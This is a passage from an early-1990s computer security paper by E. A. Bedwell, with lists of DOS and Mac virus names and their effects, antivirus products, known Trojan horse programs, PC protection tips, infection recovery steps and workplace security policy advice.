Lisbon<br />
LodeRunner Apple II GS<br />
MacMag Peace virus<br />
Madonna (while the nice music plays, your hard disk is being destroyed)<br />
Mailson<br />
Marijuana New Zealand Stoned<br />
Mazatlan Golden Gate-C<br />
Merritt Alameda virus Yale Peking Seoul<br />
Mix1<br />
Music virus Oropax virus<br />
New Jerusalem Jerusalem-C<br />
New Zealand Stoned Marijuana Australian<br />
New Zealand-B Stoned-B<br />
New Zealand-C Stoned-C<br />
nVIR<br />
October 12th 1280/Datacrime Columbus Day Friday 13th<br />
Ohio<br />
Ogre Disk Killer<br />
Oregon Century<br />
Oropax virus Music virus<br />
Pakistani Brain Lehore Basit Brain<br />
Palette Zero Bug<br />
Payday<br />
Peace Virus MacMag<br />
Pearson<br />
Peking Alameda virus Yale Merritt Seoul<br />
Pentagon<br />
Ping Pong Bouncing Dot Italian virus Bouncing Ball Vera Cruz<br />
Ping Pong-B Falling Letters-Boot<br />
PLO Jerusalem Friday 13th 1808/1813 Israeli<br />
Russian Black Hole<br />
Sacramento Alameda-B Yale C<br />
Saratoga 1 Icelandic 1<br />
Saratoga 2 Icelandic Disk-Crunching-virus<br />
Scores<br />
Search Den Zuk Venezuelan<br />
Seoul Alameda virus Yale Merritt Peking<br />
Sesame Street Cookie virus<br />
SF virus<br />
Shoe virus UIUC virus (see also Terse Shoe)<br />
<br />
<br />
<br />
<br />
<br />
- 15 -<br />
<br />
Shoe virus-B<br />
Stoned New Zealand Marijuana Australian<br />
Stoned-B New Zealand-B<br />
Stoned-C New Zealand-C<br />
SUMDOS<br />
Sunday<br />
SRI (destroys anti-viral programs before it damages your system)<br />
SURIV01 April 1st<br />
SURIV02 April 1st<br />
SURIV03<br />
Swap Israeli Boot Fat 12<br />
Sylvia Holland Girl<br />
SYS<br />
Syslock 3551<br />
System virus Icelandic 2<br />
Taunt AIDS VGA2CGA<br />
Terse Shoe (see also Shoe virus)<br />
TP04VIR Vacsina<br />
TP25VIR Yankee Doodle<br />
TP33VIR Yankee Doodle<br />
TP34VIR Yankee Doodle<br />
TP38VIR Yankee Doodle<br />
TP42VIR Yankee Doodle<br />
TP44VIR Yankee Doodle<br />
TP46VIR Yankee Doodle<br />
Traceback 3066<br />
Typo (boot)<br />
Typo (COM) Fumble<br />
UIUC virus Shoe virus<br />
UNESCO DOS-62<br />
Venezuelan Den Zuk Search<br />
Vera Cruz Ping Pong Bouncing Dot Italian Virus Bouncing Ball<br />
Vacsina TP04VIR<br />
VGA2CGA AIDS Taunt<br />
Vienna DOS-62 DOS-68 648 Austrian<br />
Vienna-B<br />
Yale Alameda virus Merritt Peking Seoul<br />
Yale C Alameda-B Sacramento<br />
Yankee Doodle TP25VIR<br />
Yankee Doodle TP33VIR<br />
Yankee Doodle TP34VIR<br />
Yankee Doodle TP38VIR<br />
Yankee Doodle TP42VIR<br />
Yankee Doodle TP44VIR<br />
Yankee Doodle TP46VIR<br />
Zero Bug 1536<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 16 -<br />
<br />
6.8 TABLE OF VIRUS EFFECTS (by virus name)<br />
<br />
This information is a reformatted version of that which was made<br />
available to the writer by the National Computer Security Association,<br />
Suite 309, 4401-A Connecticut Ave. NW, Washington, D.C., 20008.<br />
<br />
This list is not as complete as the list of names preceding. Since<br />
viruses must be created and caught before they can be analyzed for the<br />
type of information that follows, this list will never be as complete as<br />
the list of names. In some instances, you may have been infected with a<br />
variation of the name. You might wish to check this list for all<br />
possible variations of a name you've found on the list of synonyms.<br />
<br />
Explanation of codes used under "What it does", and analysis of frequency<br />
of occurrence of each effect:<br />
<br />
EFFECT # OCCURRENCES %<br />
------ - ----------- -<br />
1. Virus uses self-encryption 13 12<br />
2. Virus remains resident 83 74<br />
3. Infects COMMAND.COM 8 7<br />
4. Infects .COM files 62 55<br />
5. Infects .EXE files 41 37<br />
6. Infects .OVL files 15 13<br />
7. Infects floppy disk boot sector 36 32<br />
8. Infects hard disk boot sector 14 13<br />
9. Infects partition table 1 1<br />
10. Corrupts or overwrites boot sector 31 28<br />
11. Affects system run-time operation 53 47<br />
12. Corrupts program or overlay files 57 51<br />
13. Corrupts data files 4 4<br />
14. Formats or erases all/part of the disk 17 15<br />
15. Corrupts file linkage (FAT) 9 8<br />
16. Overwrites program 4 4<br />
17. Mac virus (as opposed to PC virus) 2 2<br />
<br />
<br />
Increase in Disinfector<br />
VIRUS NAME Prog'm size that works What it does<br />
---------- ----------- ----------- ------------<br />
<br />
1168/Datacrime B 1168 SCAN/D 1, 4, 12, 14<br />
1184/Datacrime 2 1184 1, 4, 5, 12, 14<br />
123nhalf 3907 2, 5, 11, 13<br />
1280/Datacrime 1280 SCAN/D 1, 4, 12, 14<br />
1514/Datacrime II 1514 SCAN/D 1, 4, 5, 12, 14<br />
1536/Zero Bug 1536 SCAN/D 2, 4, 11, 12<br />
1701/Cascade 1701 M-1704 1, 2, 4, 11, 12<br />
1704/Format 1704 M-1704 1, 2, 4, 11, 12, 14<br />
1704/Cascade 1704 M-1704 1, 2, 4, 11, 12<br />
1704/Cascade-B 1704 M-1704 1, 2, 4, 11, 12<br />
1704/Cascade-C 1704 1, 2, 4, 11, 12<br />
1704/Cascade-D 1704 1, 2, 4, 11, 12<br />
2930 2930 SCAN/D 2, 4, 5, 12<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 17 -<br />
<br />
3066/Traceback 3066 M-3066 2, 4, 5, 12<br />
3551/Syslock 3551 SCAN/D 1, 4, 5, 12, 13<br />
3555 3555 1, 3, 4<br />
405 SCAN/D 4, 16<br />
AIDS SCAN/D 4, 16<br />
AIDS Info Disk 0 AIDSOUT 11<br />
Alabama 1560 SCAN/D 2, 5, 11, 12, 15<br />
Alameda-B 2, 7, 10<br />
Alameda-C 2, 7, 10<br />
Alameda/Yale MDISK 2, 7, 10<br />
Amstrad 847 SCAN/D 4, 12<br />
April 1st 2, 4, 11<br />
April 1st-B 2, 5, 11<br />
Ashar MDISK 2, 7, 10<br />
Black Hole 1808 2, 4, 5, 6, 11, 12, 15<br />
Brain-B 2, 7, 8, 10<br />
Brain-C 2, 7, 8, 10<br />
Century 2, 4, 5, 6, 11, 12, 14, 15<br />
Century-B 2, 4, 5, 6, 11, 12, 14, 15<br />
Clone-B 2, 7, 10, 15<br />
Clone virus 2, 7, 8, 10<br />
dBASE 1864 SCAN/D 2, 4, 11, 12, 13<br />
DOS-62-B 3, 4, 11<br />
DOS-62-UNESCO 650 3, 4, 11<br />
Dark Avenger 1800 M-DAV 2, 3, 4, 5, 6, 11, 12, 15<br />
Datacrime II-B 1917 SCAN/D 1, 3, 4, 5, 12, 14<br />
Disk Killer MDISK 2, 7, 8, 10, 11, 12, 13, 14<br />
Do-Nothing 608 SCAN/D 4, 12<br />
Fri 13th COM 512 SCAN/D 4, 12<br />
Fri 13th COM-B 512 4, 12<br />
Fri 13th COM-C 512 4, 12<br />
Fu Manchu 2086 SCAN/D 2, 4, 5, 6, 11, 12<br />
Ghost-Boot ver. MDISK 2, 7, 8, 10, 11<br />
Ghost-COM ver. 2351 SCAN/D 4, 10, 12<br />
Golden Gate 2, 7, 10, 14<br />
Golden Gate-B 2, 7, 10, 14<br />
Golden Gate-C 2, 7, 10, 14<br />
Golden Gate-D 2, 7, 10, 14<br />
IRQ v. 41 4, 5, 11<br />
Icelandic I 642 SCAN/D 2, 5, 11, 12<br />
Icelandic II 661 SCAN/D 2, 5, 11, 12<br />
Italian/Ping Pong MDISK 2, 7, 10, 11<br />
Italian-B MDISK 2, 7, 8, 10, 11<br />
Jerusalem 1808 SCAN/D/A 2, 4, 5, 6, 11, 12<br />
Jerusalem-B 1808 M-JERUSLM 2, 4, 5, 6, 11, 12<br />
Jerusalem-C 1808 2, 4, 5, 6, 11, 12<br />
Jerusalem-D 1808 2, 4, 5, 6, 11, 12<br />
Jerusalem-E 1808 2, 4, 5, 6, 11, 12, 15<br />
Jork 2, 7, 10<br />
Lehigh SCAN/D 2, 3, 12, 14, 16<br />
Lehigh-2 2, 3, 12, 14, 15, 16<br />
Lisbon 648 SCAN/D 4, 12<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 18 -<br />
<br />
MIX1 1618 SCAN/D 2, 5, 11, 12<br />
New Jerusalem 1808 M-JERUSLM 2, 4, 5, 6, 11, 12<br />
New Zealand MD 7<br />
New Zealand-B 7, 8<br />
New Zealand-C 7, 8<br />
nVIR 11, 17<br />
Ohio MDISK 2, 7, 10<br />
Oropax 2, 4<br />
Pakistani Brain MDISK 2, 7, 10<br />
Palette/Zero Bug 1536 2, 3, 4,<br />
Payday 1808 M-JERUSLM 2, 4, 5, 6, 12<br />
Pentagon MDISK 7, 10<br />
SF Virus 2, 7, 11, 14<br />
SRI 1808 2, 4, 5, 6, 11, 12<br />
SURIV01 897 SCAN/D 2, 4, 11, 12<br />
SURIV02 1488 SCAN/D 2, 5, 11, 12<br />
SURIV03 SCAN/D 2, 4, 5, 6, 11, 12<br />
SYS 2, 7, 8, 11, 12<br />
SYS-B 2, 7, 8, 11, 12<br />
SYS-C 2, 7, 8, 11, 12<br />
Saratoga 632 SCAN/D 2, 5, 11, 12<br />
Saratoga-2 2, 5, 11, 12<br />
Scores 11, 17<br />
Search HD 2, 7, 8, 10, 11<br />
Search-B 2, 7, 10, 11<br />
Search/Den Zuk MDISK 2, 7, 10, 11<br />
Shoe virus 2, 7, 8, 10<br />
Shoe virus-B 2, 7, 10<br />
Stoned/Marijuana MDISK/P 2, 7, 9, 10, 11, 15<br />
SumDOS 1500 4, 5, 14<br />
Sunday 1636 SCAN/D 2, 4, 5, 6, 11, 12<br />
Swap/Israeli Boot MDISK 2, 7, 10<br />
Sylvia/Holland 1332 SCAN/D 2, 4, 12<br />
Terse Shoe virus 2, 7, 10<br />
Typo (Boot) MDISK 2, 7, 8, 10, 11<br />
Typo/Fumble (COM) 867 SCAN/D 2, 4, 11, 12<br />
Vacsina/TP04VIR 2, 4, 5<br />
Vienna-B 648 SCAN/D 2, 4, 5, 12<br />
Vienna/648 648 M-VIENNA 4, 12<br />
Yankee Doodle 2855 SCAN/D 2, 4, 5, 11, 12<br />
Yankee Doodle/TP25VIR 2, 4, 5<br />
Yankee Doodle/TP33VIR 2, 4, 5<br />
Yankee Doodle/TP34VIR 2, 4, 5<br />
Yankee Doodle/TP38VIR 2, 4, 5<br />
Yankee Doodle/TP42VIR 2, 4, 5<br />
Yankee Doodle/TP44VIR 2, 4, 5<br />
Yankee Doodle/TP46VIR 2, 4, 5<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 19 -<br />
<br />
6.9 VIRUS DETECTOR AND ANTIDOTE SOFTWARE<br />
<br />
*** None offer complete protection ***<br />
<br />
Some do NOT test for boot sector viruses, modification of the command<br />
interpreter, branching into the BIOS, etc., unconventional things that<br />
nasty viruses are known to do. This is not a comprehensive list, but<br />
you'll have an idea of what's available, either commercially or through<br />
public domain. Look for a product that will detect as many of the<br />
effects identified in the previous section as possible. Warning: some<br />
highly publicized virus detectors only search for ONE (1) virus! Others<br />
are more sophisticated, and may even act as a disinfector as well as a<br />
detector.<br />
<br />
<br />
Old virus symptoms vs file changes<br />
Antidote<br />
Antigen<br />
<br />
Bombsqad<br />
Canary<br />
Cylene-4<br />
C-4<br />
Disk Defender * recommended (add-on board - write-protects hard disk)<br />
Disk watcher<br />
Dr. Panda Utilities<br />
IBM - COMPare in DOS<br />
Mace vaccine<br />
Magic Bullets<br />
Syringe<br />
Sentry * recommended for systems booted regularly<br />
Vaccine<br />
Viraid<br />
Virus-Pro * recommended for large corporate environments<br />
Shareware: Novirus<br />
Flushot4+<br />
Virusck<br />
Viruscan<br />
<br />
Plus what's shown on preceding pages as a "Disinfector that works". I<br />
also have a list of over 100 shareware products that do everything from<br />
detect and/or disinfect to write-protecting the hard drive and requiring<br />
password access .... but my fingers are getting tired from typing at this<br />
point, and there are more important things to cover - after all, if<br />
you're careful, you won't need a list of detectors/disinfectors.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 20 -<br />
<br />
6.10 TROJAN HORSES<br />
<br />
While a "virus" is something hidden within another program that is<br />
waiting to make your system really sick, and a "worm" may be something<br />
that lives on its own and usually transmits through networked computers, <br />
a "Trojan Horse" is a little of both, so I've included it with this virus<br />
section if only to warn you of its existence. It lives on its own as a<br />
program, and will bring you down like Helen of Troy's soldiers. "I<br />
wouldn't copy something like that," you say. Well, like Helen's horse,<br />
it comes disguised. It will purport to do something really neat, like<br />
compress files (so you have more disk space available), sort your<br />
directories (so you can find things more easily), or play chess or<br />
another game with you. In actuality, it's really just waiting to do the<br />
things that viruses do - trash your files, scramble your boot sector, fry<br />
your FAT, or erase your hard disk. It doesn't usually do anything it<br />
promises to do.<br />
<br />
The following are just a few examples of the known Trojan Horses, most<br />
of which come from bulletin boards. Please don't misunderstand me, most<br />
BB operators are honest people who are trying to help the computer<br />
industry as a whole, but they can't be held responsible for the people<br />
who might dial into their BB and leave a disaster waiting until the next<br />
caller(s).<br />
<br />
<br />
SCRNSAVE.COM: This is supposed to blank your screen after x seconds of<br />
inactivity, thus preventing image burn-in or apparently<br />
offering a sense of security; say goodbye to your files<br />
while it erases your harddisk.<br />
<br />
TSRMAP: For the 'sophisticated' user who uses Terminate and Stay<br />
Resident programs, it's sometimes handy to have a map of<br />
where these programs are loaded in memory, and be able to<br />
delete some if you're short of memory; hopefully this<br />
same 'sophisticated' user has a copy of track 0, because<br />
his was just sent to heaven ..... or elsewhere.<br />
<br />
DOS-HELP: Sounds great, doesn't it? This TSR program is supposed to<br />
give on-line help on DOS commands. Your hard disk was<br />
just formatted.<br />
<br />
ULTIMATE.EXE: This is supposed to be a DOS shell (if you've used<br />
Directory Scanner or some other software that allows you<br />
to move around directories and load programs easily, or<br />
even a menu system, then you know what a DOS shell is). <br />
While the "Loading..." message shows on your screen, the<br />
FAT (file allocation table) of your hard disk went to the<br />
trash bin.<br />
<br />
BARDTALE.ZIP This purports to be a commercial game from Electronic Arts<br />
(BARDTALE I) Someone reverse engineered this program, and<br />
wrote in a routine to format your hard disk upon<br />
invocation.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 21 -<br />
<br />
COMPRESS.ARC This is dated April 1 1987, is executed from a file named<br />
RUN-ME.BAT, and is advertised as "shareware from Borland"<br />
(Borland is a highly reputable company). It will not<br />
compress your files, but it will very competently destroy<br />
your FAT table.<br />
<br />
<br />
DANCERS.BAS You'll actually see some animated dancers in colour -<br />
while your FAT is being tromped on.<br />
<br />
DEFENDER.ARC Think you're going to get a copy of Atari's DEFENDER for<br />
nothing, huh? There's still no such thing as a free<br />
lunch, and this one will be particularly expensive: it<br />
not only formats your hard disk, but it writes itself to<br />
your ROM BIOS - the chip that holds the Basic Input Output<br />
System for your machine. Get your wallet out.<br />
<br />
SIDEWAYS.COM The good "SIDEWAYS.EXE" is about 30Kb, while this version<br />
is about 3Kb. The really big difference, though, is what<br />
happens to your hard drive - it's spun off into oblivion.<br />
<br />
<br />
These are only a few of the 70 or so Trojans I have listed at work, but<br />
I'm sure you've got the idea. These programs (a) stand alone, (b) often<br />
claim to do something useful, (c) may be hacked versions of good<br />
software, (d) may be named the same as good software, (e) may send you<br />
back to using a quill pen.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 22 -<br />
<br />
7. PC RULES OF THUMB (Additional to Basic Rules of Thumb)<br />
<br />
Run virus check BEFORE backup<br />
<br />
Boot floppy systems from known, protected disks only<br />
<br />
Never work with masters - first make copies on a trusted machine<br />
<br />
Store data on floppy:<br />
set path in autoexec.bat, but load from A: to <br />
ensure data goes to floppy<br />
<br />
Save your data periodically while working<br />
<br />
Use write protect tabs<br />
<br />
Use write protect software on hard disk / backup track 0<br />
<br />
Never boot HD systems from floppies (unless known and<br />
protected)<br />
<br />
New/repaired hard disk? - run a virus detector<br />
<br />
Use protection package (practice safe hex)<br />
<br />
Avoid shareware / BB demos<br />
if you use a BB, set path to A: beforehand,<br />
download only to A:, poweroff immediately after,<br />
then powerup and do a virus scan on the floppy;<br />
always scan shareware<br />
<br />
Know the source of your software<br />
<br />
Don't use illegal copies<br />
<br />
If your data is truly confidential, don't depend on<br />
DELETE - you must use, e.g., Wipefile<br />
<br />
Autopark software<br />
<br />
Hardcards<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 23 -<br />
<br />
6. A FEW EASY TRICKS FOR PC SECURITY<br />
<br />
<br />
1. Set Read only attributes on all files ending with .COM, .EXE, .SYS,<br />
. OVL, .BIN, .BAT<br />
<br />
e.g.: ATTRIB +R *.SYS<br />
<br />
<br />
<br />
2. Use an undocumented trick in DOS of naming your data files ending<br />
with an ASCII blank or NUL character (ASCII 32 or 255): ***<br />
<br />
e.g.: COPY A:OLDFILE.TXT NEWFILECHR$(255).TXT<br />
or REN A:MYFILE.DAT MYFILECHR$(32).DAT<br />
<br />
*** Newer versions of DOS will give the ASCII blank or null by<br />
holding the [Alt] key and striking the numeric keypad numbers;<br />
e.g. COPY A:OLDFILE.TXT NEWFILE[Alt]255<br />
<br />
<br />
<br />
3. Prevent inadvertent formatting of the hard disk:<br />
<br />
Rename FORMAT.EXE to (e.g.) DANGER.EXE<br />
Write a 1-line batch file called FORMAT.BAT:<br />
DANGER A: %1 %2 %3 %4 %5 %6<br />
<br />
<br />
4. Have a batch program as a shutdown routine, to run:<br />
<br />
1. Virus Check<br />
2. Copy Track 0<br />
3. Back up your data files<br />
4. Park the heads<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 24 -<br />
<br />
9. SO YOU'RE INFECTED<br />
<br />
<br />
Terminate all connections with other computers<br />
<br />
Record your last activities<br />
<br />
Determine the nature and extent of the damage<br />
<br />
Notify other users<br />
<br />
Contact the source of the carrier software<br />
<br />
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ <br />
<br />
<br />
Back up data files to new diskettes<br />
<br />
Erase infected disk (using high or low level format -<br />
low level is preferred to re-write track 0)<br />
<br />
Check master disks with detection program(s)<br />
<br />
Restore system files<br />
<br />
Restore data files<br />
<br />
Run detection program(s) again<br />
<br />
Be careful in future - think like a thief!<br />
------------------<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 25 -<br />
<br />
10. SUMMARY: WHAT CAN YOU DO?<br />
<br />
There are many aspects to computer security, none of which are totally<br />
within your control, but all of which are reasonably within your control. <br />
One of the major methods of getting control is to establish an<br />
enforceable security policy AND a disaster recovery plan. However, it's<br />
almost impossible to establish a plan unless you first know what the<br />
risks are.<br />
<br />
WHEN YOU GO BACK TO YOUR OFFICE<br />
<br />
Try putting some staff into two teams: "hackers" and "police" (or call<br />
them Blue Jays and Cardinals if you find that offensive). The role of<br />
the hackers is to try to dream up all the things they could get from or<br />
do to the company (or to a department) by breaking computer security. <br />
The role of the police is to respond with defenses. Then switch roles.<br />
List all the ideas, no matter how "far out" they seem, then use this for<br />
the basis of risk analysis and disaster recovery planning. The only rule<br />
to this game is that no idea is initially rejected.<br />
<br />
Now that you have some idea of the value of your data and the risks it is<br />
under, you can begin to work on a "Computer Security Policy" and a<br />
"Disaster Recovery Plan." While many suggestions have been made on the<br />
previous pages, recognize that not all risks/solutions apply to all<br />
organizations: you have to make some judgement calls based on your<br />
assessment of the risk. The judgement is based on how much loss you can <br />
comfortably sustain, yet remain in business. The level of security<br />
protection you require may not always be the same. It may vary with the<br />
value of the hardware, software or data under consideration; the<br />
security level, therefore, might be stated as "minimal," "discretionary,"<br />
"mandatory," or "verified." The point is, as long as it's been<br />
considered, you're closer to having a good security system than if you<br />
have no policy or a policy that's based on guesswork.<br />
<br />
You may find, after working on this for a while, that you may wish to<br />
develop a separate policy for the selection or development, change,<br />
testing and implementation of software. This might be stated as simply<br />
as, "No system shall be acquired, developed, changed or implemented<br />
without the prior approval of the Systems Steering Group." This might<br />
also go on to cover documentation; e.g., "Documentation must be complete<br />
for all systems prior to implementation, and must include sections on<br />
files used, access controls, security considerations and controls<br />
(etc.)."<br />
<br />
Some further points for consideration are included in the next section.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 26 -<br />
<br />
11. COMPUTER SECURITY POLICY: POINTS FOR CONSIDERATION<br />
<br />
Any policy on computer security must be based on the premise that<br />
information is a valuable asset of the company, just like its premises,<br />
equipment, raw materials, inventory and so on. More than one company has<br />
gone under because they lost their accounts receivable data in a fire,<br />
flood, or from a simple hard disk failure. The value of your data should<br />
be subjected to a risk analysis, and all identifiable risks assessed. It<br />
is not until you identify the risks that you can plan for a disaster<br />
recovery.<br />
<br />
Your policy might include some of the many things addressed previously in<br />
this paper: e.g., storing data only on removable media (diskettes or<br />
tapes), limiting access to bulletin boards, establishing password<br />
controls, rules on physical security, use of immunization software, etc. <br />
There are, however, some other specific points not previously discussed:<br />
<br />
RESPONSIBILITY<br />
Recognize that security is a management issue, not a technological<br />
issue, and that setting policy is the responsibility of senior<br />
management. They must be 'on board' and understand why a security policy<br />
is needed to make it sensible and effective, and they must give overt<br />
support.<br />
<br />
Someone should be in charge of computer and network security. Without<br />
someone in charge, important security tasks may not get done. The duties<br />
of the security manager would include responsibility for limiting access<br />
to the network, securing the information that passes over it, overseeing<br />
password systems, and installing security packages that protect computers<br />
from illegal tampering once a user is on the network. Other duties might<br />
include analyzing the network for security weaknesses and helping users<br />
understand the security strengths and weaknesses of the network.<br />
<br />
The amount of time required of the system security specialist may depend<br />
on the size of the organization, and on the number and complexity of the<br />
systems in use or planned.<br />
<br />
Having one person in charge is probably the ideal security arrangement.<br />
The security specialist can become aware of all of the issues affecting<br />
computer/network security, can schedule and establish priority for<br />
actions, and can ensure that the actions are taken.<br />
<br />
This position in the organization requires some authority and autonomy. <br />
For instance, security is compromised if the boss shares his/her<br />
password. The security specialist needs to be able to change the boss's<br />
password if this happens, and gently but firmly discuss the problems<br />
which could result. <br />
<br />
<br />
In many organizations, putting two or more people in charge of something<br />
diffuses responsibility. Each can think that some security concern was<br />
the responsibility of the other. If two individuals are charged with<br />
network security, be certain that they work well together, communicate<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 27 -<br />
<br />
well, and will each put in their fair share of the analysis and work that<br />
is required for security.<br />
<br />
In some organizations, a "communications manager" is responsible for<br />
limiting access to the network (with dialback modems and encryption<br />
devices), while the network manager maintains password systems and<br />
installs security software. <br />
<br />
If someone is in charge of network security and you don't know about it,<br />
then they haven't been very obvious about it. They need not be. But if<br />
it is evident to you that security is lacking, then perhaps the issue of<br />
responsibility should be examined (or re-examined).<br />
<br />
<br />
BACKUPS<br />
Those who are most zealous about backups are those who've been affected<br />
in the past by a loss of data. If backups are performed every day, your<br />
computer or network is probably in good shape when the hard disk or file<br />
server goes to heaven. You will want to verify that this is the case,<br />
since most organizations (and individuals) put this off... and off...<br />
until it's too late.<br />
<br />
Backing a system up once a week is not enough, unless the system is<br />
rarely used. If your last backup was a week ago, and your hard disk or<br />
the hard disk in the file server crashes, all users of the network have<br />
lost one week's work.<br />
<br />
This cost is enormous. If you have 10 users who have lost 30 hours of<br />
work each, if each user is paid $20/hour, and overhead is 100%, then you<br />
have just lost 10 x 30 x 20 x 2 = $12,000. If you assume that backup<br />
takes one $20 hour with a tape drive, you could back the system up 600<br />
times for $12,000. That's nearly three years, if backups are done five<br />
times a week. Many hard disks will not run continuously for three years. <br />
Even if you're a 'stand alone' computer user, your time is valuable. You<br />
might consider a policy that, if recovery covers a period of more than<br />
'x' days, it must be done on the employee's own time, and all deadlines<br />
must be met - tough, but it get's the point across!<br />
<br />
Irregular backups are a sign that backup is not taken as seriously as it<br />
should be. It is probably wisest to do the arithmetic, comparing the<br />
costs of backup with the costs of losing work for multiple users. The<br />
cost comparison in the commentary on the second answer doesn't even<br />
consider the possibility of losing irreplaceable files, such as those<br />
containing new accounts receivable entries or new prospects.<br />
<br />
Since file backup is a "private" activity, not knowing how often it<br />
occurs does not mean that it does not occur. But if you have a security<br />
concern, you should find out what the correct answer is. After all, if<br />
you use the network, and it is not backed up frequently, it is your work<br />
that is lost when the hard disk in the server crashes.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 28 -<br />
<br />
BEWARE: backing up is NOT enough! You MUST periodically run your<br />
recovery procedure .... how else will you know it will work when you need<br />
it most?<br />
<br />
<br />
PURCHASING<br />
The policy should state the controls in place for purchase of both<br />
hardware and software, and it should be consistent and centralized. <br />
Unless you've seen what some software can do to destroy security, or how<br />
difficult it is to interconnect different equipment, this might seem to<br />
destroy some autonomous activities in your organization. Autonomy be<br />
darned, it's the company that's paying the bill.<br />
<br />
<br />
MAINTENANCE AGREEMENTS<br />
All warranty registrations must be mailed to the manufacturer, and<br />
records kept of purchase dates, expiry dates and repairs made under the<br />
warranty. Keeping accurate records has substantiated the complete<br />
replacement of more than one machine.<br />
<br />
<br />
SOFTWARE LOADING<br />
The checking, copying and loading of software should be the<br />
responsibility of one person or department. The 'penalty' for loading<br />
illegal/unauthorized software can range from a note in the personnel file<br />
to dismissal, depending on the organization. The opposite, copying the<br />
organization's software for loading in another location, should also be<br />
covered in the policy, because the company (as the registered owner)<br />
could be party to a lawsuit without the ability to plead ignorance.<br />
<br />
<br />
<br />
<br />
<br />
EMPLOYMENT TERMINATION<br />
In several organizations, when a person submits their resignation, their<br />
access to the computer system is immediately withdrawn. This, of course,<br />
requires a close liaison with the personnel department in large<br />
organizations. Many of these companies feel it's worth the salary cost<br />
to have the person leave the premises immediately (escorted), and simply<br />
pay out their notice period. If your company adopts such a policy, it<br />
should be made very clear that it is not an indication of trust in the<br />
person, but simply a means to reduce risk to the valuable resources of<br />
hardware, software and data. It must be administered consistently and<br />
equitably to avoid problems. There are problems with such a policy,<br />
not the least of which could be someone who gives a very lengthy notice<br />
period simply because they're aware of the policy - but you could<br />
transfer them to a clerical job for the interim (like the mail room) or<br />
to maintenance staff (washroom detail).<br />
<br />
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 29 -<br />
<br />
12. TO RUN SCAN (Virus detection software included on this diskette)<br />
<br />
SCAN looks for 42 viruses in software files, but not in data files. I<br />
know it works on Jerusalem-B because I used SCAN to detect that virus on<br />
a machine at work. This is NOT the latest version of SCAN, but then<br />
again, you're not likely to have the latest viruses (I hope).<br />
<br />
If you want to print the documentation, type: COPY A:SCAN.DOC PRN<br />
If you want to run SCAN, just type: A:SCAN [drive identifier]<br />
e.g., A:SCAN C:<br />
<br />
<br />
An article from the Washington Post, January 14, 1990, on Computer<br />
Viruses was added to the diskette after this paper was written.<br />
<br />
To read this article, key TYPE A:ARTICLE|MORE <br />
To print the article, key COPY A:ARTICLE PRN<br />
<br />
<br />
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -<br />
<br />
<br />
If you have found this presentation useful, either by attending or by<br />
reading or using the information on this diskette, then I am rewarded. <br />
If you found it useful, please feel free to copy this diskette or its<br />
contents and share it with others - I would ask that you don't change<br />
anything, though. (It was virus free at the time I made the original<br />
diskette - but if you trust that statement, you might just have made your<br />
first mistake.) <br />
<br />
If you'd like to make suggestions that would improve the information on<br />
this diskette, I would be very happy to hear from you. I'd also like to<br />
hear from you if you wish to discuss security issues, get a virus<br />
infection or hit by a Trojan Horse, or even just to comment on the<br />
contents of this paper. My address and phone number are on the first<br />
page of this document.<br />
<br />
If you would like to join the National Computer Security Association, a<br />
'form' for application is on the next page. They provide benefits such<br />
as a Virus Self-Defense Kit that's more sophisticated than the software<br />
on this diskette, newsletters, a virus-free bulletin board with hundreds<br />
of security-related programs, discounts on software, books and<br />
conferences, and advice if you run into trouble.<br />
<br />
Happy (and safe) computing!<br />
<br />
<br />
E. A. (Liz) Bedwell<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
National Computer Association<br />
Suite 309<br />
4401-A Connecticut Ave. NW<br />
Washington, DC<br />
USA 20008 Phone: (202) 364-8252<br />
<br />
<br />
<br />
<br />
[ ] I wish to join NCSA. Cheque enclosed for $45.00 (US funds)<br />
<br />
[ ] I wish to join NCSA. Please bill me for $45.00 (US funds)<br />
<br />
<br />
Name: _____________________________________________________<br />
<br />
Organization: _____________________________________________________<br />
<br />
Address: _____________________________________________________<br />
<br />
_____________________________________________________<br />
<br />
